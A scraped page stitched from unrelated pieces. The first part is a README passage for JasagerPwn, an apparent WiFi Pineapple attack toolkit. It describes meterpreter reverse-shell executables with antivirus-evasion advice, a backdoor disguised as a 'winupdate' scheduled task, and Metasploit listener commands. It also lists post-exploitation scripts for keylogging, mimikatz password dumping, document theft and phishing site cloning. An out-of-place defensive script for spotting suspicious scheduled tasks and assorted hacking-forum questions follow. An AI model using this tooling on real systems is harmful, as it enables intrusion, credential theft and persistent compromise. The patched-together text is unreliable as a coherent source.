executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one. 
This will spawn 2 meterpreter shells to the following addresses: 587 587

Persistence: It will also add a persistent backdoor to Windows that will spawn these 2 shells every 3 minutes (schtasks /query /tn winupdate)

Metasploit Listener:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST
set LPORT 587
set SessionCommunicationTimeout 0
set ExitOnSession false
set EXITFUNC process
set AutoRunScript ""
exploit -j

shellcode-tcp.exe

Description: This is a Windows meterpreter shell that was encoded into base64, embedded into a Python script that performs basic shellcode execution, and then compiled into an executable. It is not detected at the time of this writing. If the signature becomes detected, just make a new one with some random data in it.

This will spawn 2 meterpreter shells to the following addresses: 587 587

Persistence: It will also add a persistent backdoor to Windows that will spawn these 2 shells every 3 minutes (schtasks /query /tn winupdate)

Metasploit Listener:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
set LPORT 587
set ExitOnSession false
set EXITFUNC thread
set AutoRunScript "migrate -f -k"
exploit -j

Included Resources

I have included a few resources that I find useful on pentests with the pineapple.

Metasploit Scripts: These are resource scripts that can be executed from msfconsole or in meterpreter. This creates a nice way to automate post-exploitation at your fingertips. In order to run them use "resource resources/metaspoit_scripts/file_collector.rc".

file_collector.rc: Automatically search for documents on the system and download them.
enum_app_data.rc: Enumerate passwords and other data from browsers, PuTTY, etc.
keylog_recorder.rc: Start a keylogger that will poll and automatically collect keystrokes. You can use this, then CTRL+Z to background the session.
mimikatz.rc: Dump cleartext passwords from memory. Hashes are great, but why deal with cracking when they are sitting in memory in clear text?
payload_inject.rc: Inject a meterpreter session into explorer.exe. This is like "duplicate" but you can send it to your red team and not ever drop a binary on the system.
listeners.rc: This is useful for the other members of the red team not running JasagerPwn. They can just "msfconsole -r listeners.rc" and be ready to receive shells.

web_clone.sh: This is a simple wget command that I love to use to clone websites for phishing. It will put everything into a single index.html file. Note: If you're performing a MITM attack then you need to download all the resources that are hot-linked in index.html and then modify them to local, relative paths. This can be tedious but is what I have used to do every template in JasagerPwn.

airdrop-ng: This was an airdrop-ng attack module that I made before MDK3. I think MDK3 works better so I took it out and plopped it here.

Developing Attack Modules

This script was created in a modular architecture, allowing for relatively simple expansion of attack vectors. Use the "attack_module_example.sh" located in the resources directory for an example reference. There are just a few requirements when developing the modules:

If you're making a local de-authentication module, use "deauth" or "dos" in the description string.
You must have a "start_myname" and "stop_myname" function in that format (myname is arbitrary).
You must have unique "title", "description", and "bindings" variables.
I recommend editing the src/system_modules/utility.sh cleanup() function to clean up after your module.

Module Submission: If you develop an attack module that you would like to have added into JasagerPwn, that is great! Just let me know and send me the code. If it's a good idea, I'll code review it and add it into the script.

Questions / Problems

Google Code: https://code.google.com/p/jasagerpwn-reborn/
Bug Submission: https://code.google.com/p/jasagerpwn-reborn/issues/entry
Changelog: https://code.google.com/p/jasagerpwn-reborn/source/list
Questions: Feel free to ask here or in IRC (irc.hak5.org #pineapple).

Download / Update

Download via Subversion (sudo apt-get install subversion):
svn checkout http://jasagerpwn-reborn.googlecode.com/svn/trunk/ jasagerPwn-Reborn

Update Script to Latest Revision:
./jasagerPwn -u

Enjoy!
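A defender-side check for the kind of persistence the post above describes (a scheduled task such as "winupdate" that re-launches a payload every few minutes). This is an added example, not code from the JasagerPwn post or project; it parses the CSV form of `schtasks /query /fo CSV /v`, and the sample output below is constructed and abbreviated to the columns the check reads (hostname, task names, paths and users are invented).

```python
import csv
import io
import re

# Constructed, abbreviated sample of `schtasks /query /fo CSV /v` output.
# Real output carries many more columns; only the ones the check reads are kept.
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type","Repeat: Every"\n'
    '"WS01","\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start","Ready","Microsoft Corporation",'
    '"%windir%\\system32\\usoclient.exe StartScan","SYSTEM","At system startup","N/A"\n'
    '"WS01","\\winupdate","Ready","WS01\\alice",'
    '"C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe","alice","One Time Only, Minute","0 Hour(s), 3 Minute(s)"\n'
    '"WS01","\\Backup Nightly","Ready","WS01\\alice","C:\\Tools\\backup.cmd","alice","Daily","N/A"\n'
)

# schtasks renders the repetition interval as "H Hour(s), M Minute(s)".
REPEAT_RE = re.compile(r"(\d+)\s*Hour\(s\),\s*(\d+)\s*Minute\(s\)")

# Path fragments that a normal user can write to; a task launching from here is worth a look.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def repeat_minutes(value):
    """Convert the 'Repeat: Every' column to minutes, or None when the task does not repeat."""
    match = REPEAT_RE.search(value or "")
    if not match:
        return None
    return int(match.group(1)) * 60 + int(match.group(2))


def find_suspicious_tasks(csv_text, max_minutes=10):
    """Return (task name, command, reasons) for tasks that repeat at a short interval
    or run their command from a user-writable location."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("TaskName") == "TaskName":
            continue  # schtasks repeats the header line once per task folder
        reasons = []
        interval = repeat_minutes(row.get("Repeat: Every"))
        if interval is not None and interval <= max_minutes:
            reasons.append(f"repeats every {interval} min")
        command = row.get("Task To Run", "")
        if any(marker in command.lower() for marker in USER_WRITABLE):
            reasons.append("runs from user-writable path")
        if reasons:
            findings.append((row["TaskName"], command, reasons))
    return findings


if __name__ == "__main__":
    for name, command, reasons in find_suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{name}: {command} ({'; '.join(reasons)})")
```

On a live host, feed it the real output (`schtasks /query /fo CSV /v > tasks.csv`) and triage whatever it flags against the task's author and the signature of the binary it runs.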
  16. Hi all, Just a quick post about certs. I'm new to security, so I'm thinking about doing the Offensive Security course but need to save up, ha ha. I am currently a sys admin/devops and want to move into pen testing as that's where I have wanted to be for a long time. Has anyone else here done any similar certs? If so, what was your experience, was it useful to do, etc.?
  17. Work has been a little slow and I have some time on my hands. I've been considering publishing a website with a lot of hacking related content. Mostly links to tutorials, software, videos, and things like that. Basically a web directory specifically geared toward cybersecurity. I've been looking through some affiliate programs and ad networks and most of them don't want to advertise on hacking related sites, even if the site is purely informational. Looking for some kind of company that serves interstitials, banners, or something like that. I'm not really picky but I need it to meet these three conditions:
  - ad network doesn't hack my visitors
  - ad network accepts hacking related sites
  - ad network actually pays reliably
  Anybody know where I should look for something like this?
  18. Hey everybody. I am new to this forum but not new to Hak5 (love the show). It has been some time since I played with Backtrack (now Kali Linux -- has it been that long for me? hah) and toyed with the basics using my home network as a guinea pig :-D I live in an apartment complex and am starting to wonder if my home network might be the target of some tomfoolery... Trying not to sound too paranoid here, but I've been noticing more red flags lately.... it is probably nothing... but it is probably time for me to give the home network a health checkup :-) I was just wondering if someone could point me in the right direction of which tools to use, where to start, etc., using the latest version of Kali. I know a good place to start is testing the security of my wifi encryption (TKIP & AES) and passphrase... but after this I am kind of stumped as to what else I should check for. Thanks guys! Happy to be here. Hope to get to know some of you! Cheers.
  19. Hi, I want to use my 8GB USB stick as a multiboot USB which can boot into useful tools like ophcrack and Kali. I have seen that Hak5 have many videos on this topic, including multipassing USBs, Katana and such. Some of these are as old as 2006. I am interested in using Katana, but I would like the most up to date USB toolkit, from 2014/15. If you need any more info, ask. Thanks!
  20. Hi, I have an Office automation I can pentest. And I have a session that is sent from the client to the server-side Office automation to test. What can I bring this session outgoing and incoming? I'm a DLL in the client-side Office automation. Searching for what I should look for? Thank you.
  21. I want to learn more about hacking. I have heard about free hacker spaces. But whenever I look those up on Google I find a nice long list of broken links. Are there still any legal hacker spaces open?
  22. Hi! I read an article about WhatsApp. They say WhatsApp is still hackable. I tried to log in to my account with an XMPP client on Windows. I used countrycode+phonenumber as username and the md5 hash of the reversed UDID of my phone. The server was s.whatsapp.com, but I can't connect. Does anyone know what I did wrong? (I know, my English is unique :) )